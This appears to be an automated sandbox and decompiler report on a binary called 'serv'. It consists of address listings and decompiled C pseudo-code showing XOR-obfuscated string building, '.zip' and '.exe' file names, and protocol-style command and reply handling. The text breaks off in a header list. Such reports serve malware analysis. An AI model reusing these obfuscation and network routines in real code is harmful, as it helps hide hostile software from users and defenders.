                                                                    0x0040b9d5
                                                                    0x0040b9dc
                                                                    0x0040b9e3
                                                                    0x0040b9ec
                                                                    0x0040b9f0
                                                                    0x0040b9f4
                                                                    0x0040b9fa
                                                                    0x0040ba0e
                                                                    0x0040ba13
                                                                    0x0040ba17
                                                                    0x0040ba1c
                                                                    0x0040ba21
                                                                    0x0040ba25
                                                                    0x0040ba2a
                                                                    0x0040ba2e
                                                                    0x0040ba33
                                                                    0x0040ba37
                                                                    0x0040ba3c
                                                                    0x0040ba41
                                                                    0x0040ba45
                                                                    0x0040ba49
                                                                    0x0040ba4d
                                                                    0x0040ba55
                                                                    0x0040ba5c
                                                                    0x0040ba63
                                                                    0x0040ba6a
                                                                    0x0040ba72
                                                                    0x0040ba79
                                                                    0x0040ba80
                                                                    0x0040ba87
                                                                    0x0040ba8f
                                                                    0x0040ba96
                                                                    0x0040ba9e
                                                                    0x0040baa5
                                                                    0x0040baac
                                                                    0x0040bab3
                                                                    0x0040baba
                                                                    0x0040bac1
                                                                    0x0040bac8
                                                                    0x0040bad0
                                                                    0x0040bad7
                                                                    0x0040bae8
                                                                    0x0040baf2
                                                                    0x0040bb43
                                                                    0x00000000
                                                                    0x0040b490
                                                                    0x0040b498
                                                                    0x0040b498
                                                                    0x0040b48e

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "$"$#$&$+$+$-$:$B$C$D$H$W$[$_$b$d$h$p
                                                                    • API String ID: 0-4231965175
                                                                    • Opcode ID: e889707e59748b40277c21fb6c43015ced78307f90a5c1669b7c56f6ed3c130a
                                                                    • Instruction ID: 31ef18161fadce59c531c2d242bf1afe659b6137b2b03b03e49e56b792f88003
                                                                    • Opcode Fuzzy Hash: e889707e59748b40277c21fb6c43015ced78307f90a5c1669b7c56f6ed3c130a
                                                                    • Instruction Fuzzy Hash: DB223D7540D7C18EC321CB68844469BFFE1ABEA314F484A5EF5D897392C3749609CBAB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00413040(intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24) {
                                                                    				char _v120;
                                                                    				char _v128;
                                                                    				char _v129;
                                                                    				char _v130;
                                                                    				char _v131;
                                                                    				char _v132;
                                                                    				char _v133;
                                                                    				char _v134;
                                                                    				char _v135;
                                                                    				char _v136;
                                                                    				char _v137;
                                                                    				char _v138;
                                                                    				char _v139;
                                                                    				char _v140;
                                                                    				char _v141;
                                                                    				char _v142;
                                                                    				char _v143;
                                                                    				char _v144;
                                                                    				char _v146;
                                                                    				char _v147;
                                                                    				char _v148;
                                                                    				char _v149;
                                                                    				char _v150;
                                                                    				char _v151;
                                                                    				char _v152;
                                                                    				char _v153;
                                                                    				char _v154;
                                                                    				char _v155;
                                                                    				char _v156;
                                                                    				char _v160;
                                                                    				char _v161;
                                                                    				char _v162;
                                                                    				char _v163;
                                                                    				char _v164;
                                                                    				signed int _v168;
                                                                    				char _v172;
                                                                    				char _v173;
                                                                    				char _v174;
                                                                    				char _v175;
                                                                    				char _v176;
                                                                    				char _v192;
                                                                    				void* __ebp;
                                                                    				signed int _t88;
                                                                    				signed int _t89;
                                                                    				signed int _t92;
                                                                    				signed int _t93;
                                                                    				intOrPtr* _t98;
                                                                    				signed int _t99;
                                                                    				void* _t105;
                                                                    				intOrPtr* _t106;
                                                                    				void* _t114;
                                                                    				intOrPtr* _t119;
                                                                    				intOrPtr* _t122;
                                                                    				intOrPtr* _t125;
                                                                    				intOrPtr* _t129;
                                                                    				intOrPtr _t132;
                                                                    				intOrPtr* _t135;
                                                                    				signed int _t140;
                                                                    				signed int _t147;
                                                                    				intOrPtr _t148;
                                                                    				signed int _t153;
                                                                    				intOrPtr _t155;
                                                                    				intOrPtr _t158;
                                                                    				intOrPtr _t160;
                                                                    				intOrPtr _t162;
                                                                    				void* _t166;
                                                                    				intOrPtr _t168;
                                                                    				void* _t177;
                                                                    				void* _t183;
                                                                    				void* _t184;
                                                                    				void* _t186;
                                                                    				void* _t187;
                                                                    				intOrPtr* _t188;
                                                                    				void* _t189;
                                                                    				intOrPtr* _t190;
                                                                    				intOrPtr _t195;
                                                                    				intOrPtr _t198;
                                                                    				void* _t199;
                                                                    				intOrPtr* _t200;
                                                                    				void* _t201;
                                                                    				void* _t202;
                                                                    				void* _t203;
                                                                    
                                                                    				_t201 =  &_v176;
                                                                    				_t140 =  *0x447b60; // 0x530
                                                                    				_t88 = _v168 + (0x00000003 - _v168 * _t140 & 0x00000004) * 0x65;
                                                                    				if(_t88 >= 0x77) {
                                                                    					_t89 = _t88 ^ 0x00000042;
                                                                    				} else {
                                                                    					_t89 = _t88 ^ 0x0000001d;
                                                                    				}
                                                                    				_v176 = 0x2e;
                                                                    				if(_t89 >= 0x77) {
                                                                    				}
                                                                    				_t92 = _v168 + (0x00000003 - _v168 * _t140 & 0x00000004) * 0x65;
                                                                    				_v175 = 0x7a;
                                                                    				_v174 = 0x69;
                                                                    				_v173 = 0x70;
                                                                    				_v172 = 0;
                                                                    				if(_t92 >= 0x77) {
                                                                    					_t93 = _t92 ^ 0x00000042;
                                                                    				} else {
                                                                    					_t93 = _t92 ^ 0x0000001d;
                                                                    				}
                                                                    				_v164 = 0x2e;
                                                                    				if(_t93 >= 0x77) {
                                                                    				}
                                                                    				_v163 = 0x65;
                                                                    				_v162 = 0x78;
                                                                    				_v161 = 0x65;
                                                                    				_v160 = 0;
                                                                    				E0041E5F0();
                                                                    				_t195 = _a8;
                                                                    				E004114B0(_t199, _t195);
                                                                    				_t200 = 0x10;
                                                                    				_t202 = _t201 + 4;
                                                                    				_t190 = _t195 + 4;
                                                                    				if( *((intOrPtr*)(_t195 + 0x18)) < 0x10) {
                                                                    					_t98 = _t190;
                                                                    				} else {
                                                                    					_t98 =  *_t190;
                                                                    				}
                                                                    				_t99 = E0041A190(_t98, 0x2e);
                                                                    				_t203 = _t202 + 8;
                                                                    				_v168 = _t99;
                                                                    				if(_t99 == 0) {
                                                                    					_v156 = 0x6c;
                                                                    					_v153 = 0x6c;
                                                                    					_v155 = 0x79;
                                                                    					_v154 = 0x79;
                                                                    					_t147 = _v168 + (0x00000003 - _v168 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    					_v152 = 0x6e;
                                                                    					_v151 = 0x65;
                                                                    					_v150 = 0x23;
                                                                    					_v149 = 0x77;
                                                                    					_v148 = 0x64;
                                                                    					_v147 = 0x7d;
                                                                    					_v146 = 0xd;
                                                                    					_t105 = 0;
                                                                    					do {
                                                                    						if(_t147 >= 0x77) {
                                                                    							_t147 = _t147 ^ 0x00000042;
                                                                    						} else {
                                                                    							_t147 = _t147 ^ 0x0000001d;
                                                                    						}
                                                                    						 *(_t203 + _t105 + 0x20) =  *(_t203 + _t105 + 0x20) ^ 0x0000000d;
                                                                    						_t105 = _t105 + 1;
                                                                    					} while (_t105 < 0xb);
                                                                    					_t106 =  &_v156;
                                                                    					_t43 = _t106 + 1; // 0xe
                                                                    					_t177 = _t43;
                                                                    					do {
                                                                    						_t148 =  *_t106;
                                                                    						_t106 = _t106 + 1;
                                                                    					} while (_t148 != 0);
                                                                    					E00402810(_a4,  &_v156, _t106 - _t177);
                                                                    				} else {
                                                                    					if( *((intOrPtr*)(_t195 + 0x18)) >= _t200) {
                                                                    						_t190 =  *_t190;
                                                                    					}
                                                                    					_t198 = _a4;
                                                                    					_t132 =  *((intOrPtr*)(_t198 + 0x18));
                                                                    					_t188 = _t198 + 4;
                                                                    					if(_t132 < _t200) {
                                                                    						_t200 = _t188;
                                                                    					} else {
                                                                    						_t200 =  *_t188;
                                                                    					}
                                                                    					_t166 =  *((intOrPtr*)(_t198 + 0x14)) + _t200;
                                                                    					if(_t132 >= 0x10) {
                                                                    						_t188 =  *_t188;
                                                                    					}
                                                                    					E00406370(_t198, _t200, _t188, _t166, _t190, _v168);
                                                                    					_t135 =  &_v192;
                                                                    					_t189 = _t135 + 1;
                                                                    					do {
                                                                    						_t168 =  *_t135;
                                                                    						_t135 = _t135 + 1;
                                                                    					} while (_t168 != 0);
                                                                    					E0040D320(_t198, _t200,  &_v176, _t135 - _t189);
                                                                    				}
                                                                    				_v142 = 0x88;
                                                                    				_v134 = 0x88;
                                                                    				_v138 = 0xc1;
                                                                    				_v133 = 0xc1;
                                                                    				_t153 = _v168 + (0x00000003 - _v168 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v144 = 0xb9;
                                                                    				_v143 = 0x9c;
                                                                    				_v141 = 0x8d;
                                                                    				_v140 = 0x98;
                                                                    				_v139 = 0x89;
                                                                    				_v137 = 0xa7;
                                                                    				_v136 = 0xae;
                                                                    				_v135 = 0xc9;
                                                                    				_v132 = 0x94;
                                                                    				_v131 = 0xd4;
                                                                    				_v130 = 0xda;
                                                                    				_v129 = 0xec;
                                                                    				_t114 = 0;
                                                                    				do {
                                                                    					if(_t153 >= 0x77) {
                                                                    						_t153 = _t153 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t153 = _t153 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t203 + _t114 + 0x2c) =  *(_t203 + _t114 + 0x2c) ^ 0x000000ec;
                                                                    					_t114 = _t114 + 1;
                                                                    				} while (_t114 < 0x10);
                                                                    				wsprintfA( &_v128,  &_v144, GetTickCount() % 0x2710);
                                                                    				_t119 =  &_v120;
                                                                    				_t183 = _t119 + 1;
                                                                    				do {
                                                                    					_t155 =  *_t119;
                                                                    					_t119 = _t119 + 1;
                                                                    				} while (_t155 != 0);
                                                                    				_t196 = _a24;
                                                                    				E00402810(_a24,  &_v120, _t119 - _t183);
                                                                    				_t122 =  &_v164;
                                                                    				_t184 = _t122 + 1;
                                                                    				do {
                                                                    					_t158 =  *_t122;
                                                                    					_t122 = _t122 + 1;
                                                                    				} while (_t158 != 0);
                                                                    				E0040D320(_t196, _t200,  &_v156, _t122 - _t184);
                                                                    				_t125 =  &_v128;
                                                                    				_t186 = _t125 + 1;
                                                                    				do {
                                                                    					_t160 =  *_t125;
                                                                    					_t125 = _t125 + 1;
                                                                    				} while (_t160 != 0);
                                                                    				_t197 = _a20;
                                                                    				E00402810(_a20,  &_v120, _t125 - _t186);
                                                                    				_t129 =  &_v176;
                                                                    				_t187 = _t129 + 1;
                                                                    				do {
                                                                    					_t162 =  *_t129;
                                                                    					_t129 = _t129 + 1;
                                                                    				} while (_t162 != 0);
                                                                    				return E0040D320(_t197, _t200,  &_v168, _t129 - _t187);
                                                                    			}





















































































                                                                    0x00413052
                                                                    0x00413047
                                                                    0x00413067
                                                                    0x0041306d
                                                                    0x00413074
                                                                    0x0041306f
                                                                    0x0041306f
                                                                    0x0041306f
                                                                    0x0041307a
                                                                    0x0041307f
                                                                    0x0041307f
                                                                    0x0041309f
                                                                    0x004130a4
                                                                    0x004130a9
                                                                    0x004130ae
                                                                    0x004130b3
                                                                    0x004130b8
                                                                    0x004130bf
                                                                    0x004130ba
                                                                    0x004130ba
                                                                    0x004130ba
                                                                    0x004130c5
                                                                    0x004130ca
                                                                    0x004130ca
                                                                    0x004130d4
                                                                    0x004130d9
                                                                    0x004130de
                                                                    0x004130e3
                                                                    0x004130e8
                                                                    0x004130ed
                                                                    0x004130f5
                                                                    0x004130fd
                                                                    0x00413102
                                                                    0x00413107
                                                                    0x0041310a
                                                                    0x00413110
                                                                    0x0041310c
                                                                    0x0041310c
                                                                    0x0041310c
                                                                    0x00413115
                                                                    0x0041311a
                                                                    0x0041311f
                                                                    0x00413123
                                                                    0x00413182
                                                                    0x00413186
                                                                    0x00413199
                                                                    0x0041319d
                                                                    0x004131ae
                                                                    0x004131b0
                                                                    0x004131b5
                                                                    0x004131ba
                                                                    0x004131bf
                                                                    0x004131c4
                                                                    0x004131c9
                                                                    0x004131ce
                                                                    0x004131d3
                                                                    0x004131d5
                                                                    0x004131d8
                                                                    0x004131df
                                                                    0x004131da
                                                                    0x004131da
                                                                    0x004131da
                                                                    0x004131e2
                                                                    0x004131e7
                                                                    0x004131e8
                                                                    0x004131ed
                                                                    0x004131f1
                                                                    0x004131f1
                                                                    0x004131f4
                                                                    0x004131f4
                                                                    0x004131f6
                                                                    0x004131f7
                                                                    0x0041320a
                                                                    0x00413125
                                                                    0x00413128
                                                                    0x0041312a
                                                                    0x0041312a
                                                                    0x0041312c
                                                                    0x00413133
                                                                    0x00413138
                                                                    0x0041313b
                                                                    0x00413141
                                                                    0x0041313d
                                                                    0x0041313d
                                                                    0x0041313d
                                                                    0x00413146
                                                                    0x0041314b
                                                                    0x0041314d
                                                                    0x0041314d
                                                                    0x00413159
                                                                    0x0041315e
                                                                    0x00413162
                                                                    0x00413165
                                                                    0x00413165
                                                                    0x00413167
                                                                    0x00413168
                                                                    0x00413176
                                                                    0x00413176
                                                                    0x00413211
                                                                    0x00413215
                                                                    0x00413228
                                                                    0x0041322c
                                                                    0x0041323d
                                                                    0x0041323f
                                                                    0x00413244
                                                                    0x00413249
                                                                    0x0041324e
                                                                    0x00413253
                                                                    0x00413258
                                                                    0x0041325d
                                                                    0x00413262
                                                                    0x00413267
                                                                    0x0041326c
                                                                    0x00413271
                                                                    0x00413276
                                                                    0x0041327b
                                                                    0x00413280
                                                                    0x00413283
                                                                    0x0041328a
                                                                    0x00413285
                                                                    0x00413285
                                                                    0x00413285
                                                                    0x0041328d
                                                                    0x00413292
                                                                    0x00413293
                                                                    0x004132b2
                                                                    0x004132b8
                                                                    0x004132bf
                                                                    0x004132c2
                                                                    0x004132c2
                                                                    0x004132c4
                                                                    0x004132c5
                                                                    0x004132c9
                                                                    0x004132da
                                                                    0x004132df
                                                                    0x004132e3
                                                                    0x004132e6
                                                                    0x004132e6
                                                                    0x004132e8
                                                                    0x004132e9
                                                                    0x004132f7
                                                                    0x004132fc
                                                                    0x00413300
                                                                    0x00413303
                                                                    0x00413303
                                                                    0x00413305
                                                                    0x00413306
                                                                    0x0041330a
                                                                    0x0041331b
                                                                    0x00413320
                                                                    0x00413324
                                                                    0x00413327
                                                                    0x00413327
                                                                    0x00413329
                                                                    0x0041332a
                                                                    0x00413346

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CountTickwsprintf
                                                                    • String ID: #$.$.$d$e$e$e$i$n$p$w$x$z$}
                                                                    • API String ID: 2424974917-2721937254
                                                                    • Opcode ID: 40435ed0216c2b88c2f168e78c7edf8dd83cba05c9ddd047ee5b6b2d53ab7b8e
                                                                    • Instruction ID: db8aa865835786eeec74abee6f333092b9e25c573af84edeb86da67176a37afa
                                                                    • Opcode Fuzzy Hash: 40435ed0216c2b88c2f168e78c7edf8dd83cba05c9ddd047ee5b6b2d53ab7b8e
                                                                    • Instruction Fuzzy Hash: F491053120C3819FD315CF28C854AAFBBD55BD6304F088A5EF4D697292DA28D649C76B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 81%
                                                                    			E004184D0(intOrPtr __ecx) {
                                                                    				intOrPtr _t90;
                                                                    				intOrPtr _t91;
                                                                    				signed int _t98;
                                                                    				intOrPtr _t106;
                                                                    				intOrPtr _t116;
                                                                    				signed int _t123;
                                                                    				intOrPtr _t126;
                                                                    				intOrPtr* _t128;
                                                                    				signed int _t135;
                                                                    				signed int _t140;
                                                                    				void* _t147;
                                                                    				signed int _t149;
                                                                    				signed int _t154;
                                                                    				void* _t158;
                                                                    				void* _t161;
                                                                    				void* _t166;
                                                                    				void* _t169;
                                                                    				signed int _t172;
                                                                    				signed int _t173;
                                                                    				intOrPtr _t176;
                                                                    				signed int _t177;
                                                                    				void* _t178;
                                                                    				signed int _t179;
                                                                    				intOrPtr _t180;
                                                                    				void* _t185;
                                                                    				void* _t186;
                                                                    				void* _t187;
                                                                    				void* _t188;
                                                                    				void* _t189;
                                                                    
                                                                    				_t180 = __ecx;
                                                                    				 *((intOrPtr*)(_t185 + 0x34)) = __ecx;
                                                                    				_t172 =  *(_t185 + 0x38);
                                                                    				if(_t172 >= 0x19) {
                                                                    					_t173 = _t172 + 0x6f;
                                                                    				} else {
                                                                    					_t173 = _t172 ^ 0x00000052;
                                                                    				}
                                                                    				E0041E5F0();
                                                                    				 *((char*)(_t185 + 0x24)) = 0xf3;
                                                                    				 *((char*)(_t185 + 0x2c)) = 0xf3;
                                                                    				_t135 =  *0x447d20; // 0x0
                                                                    				 *((char*)(_t185 + 0x25)) = 0xff;
                                                                    				 *((char*)(_t185 + 0x26)) = 0xf7;
                                                                    				 *((char*)(_t185 + 0x27)) = 0xf2;
                                                                    				 *(_t185 + 0x28) = 0x9e;
                                                                    				 *((char*)(_t185 + 0x29)) = 0xf8;
                                                                    				 *((char*)(_t185 + 0x2a)) = 0xec;
                                                                    				 *((char*)(_t185 + 0x2b)) = 0xf1;
                                                                    				 *((char*)(_t185 + 0x2d)) = 0x84;
                                                                    				 *((char*)(_t185 + 0x2e)) = 0x9e;
                                                                    				 *((char*)(_t185 + 0x2f)) = 0x82;
                                                                    				 *((char*)(_t185 + 0x30)) = 0x9b;
                                                                    				 *((char*)(_t185 + 0x31)) = 0xcd;
                                                                    				 *((char*)(_t185 + 0x32)) = 0x80;
                                                                    				 *((char*)(_t185 + 0x33)) = 0xb3;
                                                                    				 *((char*)(_t185 + 0x34)) = 0xb4;
                                                                    				 *((char*)(_t185 + 0x35)) = 0xbe;
                                                                    				_t158 = 0;
                                                                    				do {
                                                                    					_t21 = _t135 - 0x5d; // -93
                                                                    					_t135 = _t135 + ((_t21 ^ 0x0000147c) + (_t21 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t185 + _t158 + 0x24) =  *(_t185 + _t158 + 0x24) ^ 0x000000be;
                                                                    					_t158 = _t158 + 1;
                                                                    				} while (_t158 < 0x12);
                                                                    				_t90 =  *((intOrPtr*)(_t185 + 0x844));
                                                                    				if( *((intOrPtr*)(_t90 + 0x18)) < 0x10) {
                                                                    					_t91 = _t90 + 4;
                                                                    				} else {
                                                                    					_t91 =  *((intOrPtr*)(_t90 + 4));
                                                                    				}
                                                                    				wsprintfA(_t185 + 0x44, _t185 + 0x28, _t91);
                                                                    				_t128 =  *0x43003c;
                                                                    				_t177 =  *0x447d28; // 0x0
                                                                    				_t186 = _t185 + 0xc;
                                                                    				_push(_t186 + 0x3c);
                                                                    				if(E00419410( *_t128(), _t180, _t186 + 0x40, _t94) != 0xffffffff) {
                                                                    					_t140 =  *(_t186 + 0x13) & 0x000000ff;
                                                                    					_t98 = _t177 & _t140 ^ 0x0000002b;
                                                                    					_t161 = 0x15;
                                                                    					do {
                                                                    						_t177 = _t177 + (_t140 ^ _t177 ^ 0x00000060 | _t98);
                                                                    						_t161 = _t161 - 1;
                                                                    					} while (_t161 != 0);
                                                                    					_t180 =  *((intOrPtr*)(_t186 + 0x38));
                                                                    					if(E00419290(_t180, _t186 + 0x440, 0x400) == 0xffffffff) {
                                                                    						_t178 = 6;
                                                                    						goto L34;
                                                                    					} else {
                                                                    						_t106 = E00422B9E(_t186 + 0x43c);
                                                                    						_t187 = _t186 + 4;
                                                                    						 *((intOrPtr*)(_t180 + 0x24)) = _t106;
                                                                    						if(_t106 == 0xfa) {
                                                                    							_t147 = 0x2c;
                                                                    							do {
                                                                    								_t173 = _t173 + (0x00000059 | _t173);
                                                                    								_t147 = _t147 - 1;
                                                                    							} while (_t147 != 0);
                                                                    							 *((char*)(_t187 + 0x17)) = 0x22;
                                                                    							 *((char*)(_t187 + 0x19)) = 0x22;
                                                                    							_t149 =  *0x447d20; // 0x0
                                                                    							 *((char*)(_t187 + 0x14)) = 0x24;
                                                                    							 *((char*)(_t187 + 0x15)) = 0x35;
                                                                    							 *((char*)(_t187 + 0x16)) = 0x26;
                                                                    							 *(_t187 + 0x18) = 0x56;
                                                                    							 *((char*)(_t187 + 0x1a)) = 0x39;
                                                                    							 *((char*)(_t187 + 0x1b)) = 0x4c;
                                                                    							 *((char*)(_t187 + 0x1c)) = 0x56;
                                                                    							 *((char*)(_t187 + 0x1d)) = 0x4a;
                                                                    							 *((char*)(_t187 + 0x1e)) = 0x53;
                                                                    							 *((char*)(_t187 + 0x1f)) = 5;
                                                                    							 *((char*)(_t187 + 0x20)) = 0x48;
                                                                    							 *((char*)(_t187 + 0x21)) = 0x7b;
                                                                    							 *((char*)(_t187 + 0x22)) = 0x7c;
                                                                    							 *((char*)(_t187 + 0x23)) = 0x76;
                                                                    							_t166 = 0;
                                                                    							do {
                                                                    								_t58 = _t149 - 0x5d; // -93
                                                                    								_t149 = _t149 + ((_t58 ^ 0x0000147c) + (_t58 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    								 *(_t187 + _t166 + 0x14) =  *(_t187 + _t166 + 0x14) ^ 0x00000076;
                                                                    								_t166 = _t166 + 1;
                                                                    							} while (_t166 < 0x10);
                                                                    							_t176 =  *((intOrPtr*)(_t187 + 0x844));
                                                                    							if( *((intOrPtr*)(_t176 + 0x50)) < 0x10) {
                                                                    								_t116 = _t176 + 0x3c;
                                                                    							} else {
                                                                    								_t116 =  *((intOrPtr*)(_t176 + 0x3c));
                                                                    							}
                                                                    							wsprintfA(_t187 + 0x44, _t187 + 0x18, _t116);
                                                                    							_t179 =  *0x447d28; // 0x0
                                                                    							_t188 = _t187 + 0xc;
                                                                    							_push(_t188 + 0x3c);
                                                                    							if(E00419410( *_t128(), _t180, _t188 + 0x40, _t119) != 0xffffffff) {
                                                                    								_t154 =  *(_t188 + 0x13) & 0x000000ff;
                                                                    								_t123 = _t179 & _t154 ^ 0x0000002b;
                                                                    								_t169 = 0x15;
                                                                    								do {
                                                                    									_t179 = _t179 + (_t154 ^ _t179 ^ 0x00000060 | _t123);
                                                                    									_t169 = _t169 - 1;
                                                                    								} while (_t169 != 0);
                                                                    								if(E00419290(_t180, _t188 + 0x440, 0x400) == 0xffffffff) {
                                                                    									_t178 = 6;
                                                                    									goto L25;
                                                                    								} else {
                                                                    									_t126 = E00422B9E(_t188 + 0x43c);
                                                                    									_t189 = _t188 + 4;
                                                                    									 *((intOrPtr*)(_t180 + 0x24)) = _t126;
                                                                    									if(_t126 == 0xfa) {
                                                                    										_t178 = E004181F0(_t180,  *((intOrPtr*)(_t189 + 0x840)), _t176);
                                                                    										if(_t178 == 0) {
                                                                    											goto L26;
                                                                    										} else {
                                                                    											goto L34;
                                                                    										}
                                                                    									} else {
                                                                    										_t178 = 8;
                                                                    										goto L37;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								_t178 = 7;
                                                                    								goto L25;
                                                                    							}
                                                                    						} else {
                                                                    							_t178 = 8;
                                                                    							goto L34;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_t178 = 7;
                                                                    					L34:
                                                                    					if(_t178 == 6 || _t178 == 7) {
                                                                    						L25:
                                                                    						 *((intOrPtr*)(_t180 + 0x28)) =  *((intOrPtr*)(_t180 + 0x1c));
                                                                    						E00419210(_t180);
                                                                    						goto L26;
                                                                    					} else {
                                                                    						if(_t178 == 0) {
                                                                    							L26:
                                                                    							return _t178;
                                                                    						} else {
                                                                    							L37:
                                                                    							if( *((intOrPtr*)(_t180 + 4)) == 0xffffffff) {
                                                                    								goto L26;
                                                                    							} else {
                                                                    								E00418330(_t180);
                                                                    								E00419180();
                                                                    								return _t178;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}
































                                                                    0x004184d8
                                                                    0x004184db
                                                                    0x004184e0
                                                                    0x004184e7
                                                                    0x004184ee
                                                                    0x004184e9
                                                                    0x004184e9
                                                                    0x004184e9
                                                                    0x004184f1
                                                                    0x004184fa
                                                                    0x004184fe
                                                                    0x00418502
                                                                    0x00418508
                                                                    0x0041850d
                                                                    0x00418512
                                                                    0x00418517
                                                                    0x0041851b
                                                                    0x00418520
                                                                    0x00418525
                                                                    0x0041852a
                                                                    0x0041852f
                                                                    0x00418533
                                                                    0x00418538
                                                                    0x0041853d
                                                                    0x00418542
                                                                    0x00418547
                                                                    0x0041854c
                                                                    0x00418551
                                                                    0x00418556
                                                                    0x00418560
                                                                    0x00418560
                                                                    0x00418574
                                                                    0x0041857a
                                                                    0x0041857e
                                                                    0x0041857f
                                                                    0x00418584
                                                                    0x0041858f
                                                                    0x00418596
                                                                    0x00418591
                                                                    0x00418591
                                                                    0x00418591
                                                                    0x004185a4
                                                                    0x004185aa
                                                                    0x004185b0
                                                                    0x004185b6
                                                                    0x004185bd
                                                                    0x004185d0
                                                                    0x004185dc
                                                                    0x004185ea
                                                                    0x004185ed
                                                                    0x004185f2
                                                                    0x004185fb
                                                                    0x004185fd
                                                                    0x004185fd
                                                                    0x00418600
                                                                    0x0041861b
                                                                    0x00418641
                                                                    0x00000000
                                                                    0x0041861d
                                                                    0x00418625
                                                                    0x0041862a
                                                                    0x00418632
                                                                    0x00418635
                                                                    0x00418659
                                                                    0x00418660
                                                                    0x00418664
                                                                    0x00418666
                                                                    0x00418666
                                                                    0x0041866d
                                                                    0x00418671
                                                                    0x00418675
                                                                    0x0041867b
                                                                    0x00418680
                                                                    0x00418685
                                                                    0x0041868a
                                                                    0x0041868e
                                                                    0x00418693
                                                                    0x00418698
                                                                    0x0041869c
                                                                    0x004186a1
                                                                    0x004186a6
                                                                    0x004186ab
                                                                    0x004186b0
                                                                    0x004186b5
                                                                    0x004186ba
                                                                    0x004186bf
                                                                    0x004186c1
                                                                    0x004186c1
                                                                    0x004186d5
                                                                    0x004186db
                                                                    0x004186df
                                                                    0x004186e0
                                                                    0x004186e5
                                                                    0x004186f0
                                                                    0x004186f7
                                                                    0x004186f2
                                                                    0x004186f2
                                                                    0x004186f2
                                                                    0x00418705
                                                                    0x0041870b
                                                                    0x00418711
                                                                    0x00418718
                                                                    0x0041872b
                                                                    0x0041874e
                                                                    0x0041875c
                                                                    0x0041875f
                                                                    0x00418764
                                                                    0x0041876d
                                                                    0x0041876f
                                                                    0x0041876f
                                                                    0x00418789
                                                                    0x004187ac
                                                                    0x00000000
                                                                    0x0041878b
                                                                    0x00418793
                                                                    0x00418798
                                                                    0x004187a0
                                                                    0x004187a3
                                                                    0x004187c6
                                                                    0x004187ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004187a5
                                                                    0x004187a5
                                                                    0x00000000
                                                                    0x004187a5
                                                                    0x004187a3
                                                                    0x0041872d
                                                                    0x0041872d
                                                                    0x00000000
                                                                    0x0041872d
                                                                    0x00418637
                                                                    0x00418637
                                                                    0x00000000
                                                                    0x00418637
                                                                    0x00418635
                                                                    0x004185d2
                                                                    0x004185d2
                                                                    0x004187d0
                                                                    0x004187d3
                                                                    0x00418732
                                                                    0x00418737
                                                                    0x0041873a
                                                                    0x00000000
                                                                    0x004187e2
                                                                    0x004187e4
                                                                    0x0041873f
                                                                    0x0041874b
                                                                    0x004187ea
                                                                    0x004187ea
                                                                    0x004187ee
                                                                    0x00000000
                                                                    0x004187f4
                                                                    0x004187f6
                                                                    0x004187fd
                                                                    0x0041880e
                                                                    0x0041880e
                                                                    0x004187ee
                                                                    0x004187e4
                                                                    0x004187d3

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
